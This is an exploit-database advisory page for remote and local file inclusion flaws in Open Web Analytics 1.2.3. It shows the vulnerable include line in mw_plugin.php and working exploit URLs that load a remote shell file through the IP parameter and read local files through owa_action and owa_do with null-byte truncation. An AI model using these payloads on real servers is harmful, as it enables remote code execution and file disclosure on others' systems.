Open Web Analytics 1.2.3

vendor:

Open Web Analytics

by:

ItSecTeam

7,5

CVSS

HIGH

Multi File Include

CWE

Product Name: Open Web Analytics

Affected Version From: 1.2.3

Affected Version To: 1.2.3

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

The vulnerability exists due to insufficient sanitization of user-supplied input in the 'IP' and 'owa_action' and 'owa_do' parameters in the 'mw_plugin.php' script. This can be exploited to include arbitrary files from local resources via directory traversal sequences and URLs to remote resources by using RFI (Remote File Include) and LFI (Local File Include) attacks.

Mitigation:

Input validation should be used to prevent the exploitation of this vulnerability.

Source

Exploit-DB raw data:

===========================================================================
( #Topic    : Open Web Analytics 1.2.3
( #Bug type : multi file include
( #Download : http://downloads.openwebanalytics.com/owa/owa_1_2_3.tar
( #Advisory : 
===========================================================================
( #Author : ItSecTeam
( #Email  : Bug@ITSecTeam.com
( #Website: http://www.itsecteam.com
( #Forum  : http://forum.ITSecTeam.com
( #Original Advisory: www.ITSecTeam.com/en/vulnerabilities/vulnerability26.htm
( #Special Tnx : ahmadbady , M3hr@n.S And All Team Members!

vuls:===================================================================
path/mw_plugin.php

require_once "$IP/includes/SpecialPage.php";   

exploit:===================================================================

rfi : path/mw_plugin.php?IP=shell.txt?

lfi :path/index.php?owa_action=[lfi]%00
lfi :path/index.php?owa_do=[lfi]%00
--------------------------------------